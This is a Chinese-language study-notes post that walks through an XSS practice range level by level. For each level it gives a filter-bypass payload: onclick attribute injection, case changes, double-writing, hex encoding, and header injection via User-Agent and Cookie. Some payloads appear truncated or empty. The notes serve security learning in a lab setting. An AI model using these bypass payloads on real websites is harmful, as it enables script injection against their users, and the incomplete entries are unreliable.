一品网
  • 首页

Web安全测试学习笔记 - XSS靶场 - test.ctf8.com


1.

2.显示文字区域过滤了<>,但是input没有过滤,payload:">

3.显示文字区域和input都过滤了<>,payload:'onclick='javascript:alert(1)'

4. payload:" onclick='javascript:alert(1)'

5.on和script会被加上下划线,payload:">

6.href,src,data这些关键字都加下划线了,payload:" Onclick='javascript:alert(1)'

7.双写绕过,payload:"> alert(1)

8.16进制编码,payload: javascript:alert(1);

9.必须要有http://,利用js的注释符,payload:javascript:alert(1) // http://

10.有个隐藏控件,但是过滤了<>,payload:&t_sort=" type="text" onclick="alert(1)

11.跪了,网上找的答案:

12. 和上一题一样,改User Agent

13.同上,用Cookie

 

14、15貌似都有问题,跳过

16. script和空格没法用,payload:keyword=,或者:

17-20. flash会被禁止,无法弹框

安全测试XSS靶场XSStest.ctf8.com

相关


XSS BOT编写

3、wxss样式

简单了解WEB漏洞-XSS跨站

快速搭建Web安全测试环境

XSS 跨站脚本攻击 漏洞

初识XSS攻击

xss防御及绕过-小记1

安全测试-Tomcat样例目录

安全测试--- web安全测试 常规安全漏洞;可能存在SQL和JS注入漏洞场景分析;为什么自己没

安全测试---web常规安全漏洞问题介绍和防范说明,如:SQL注入攻击、XSS跨站点脚本攻击(JS注

SpringBoot——防止sql注入,xss攻击

XSS-lab通过教程🐶

标签

一品网 冀ICP备14022925号-6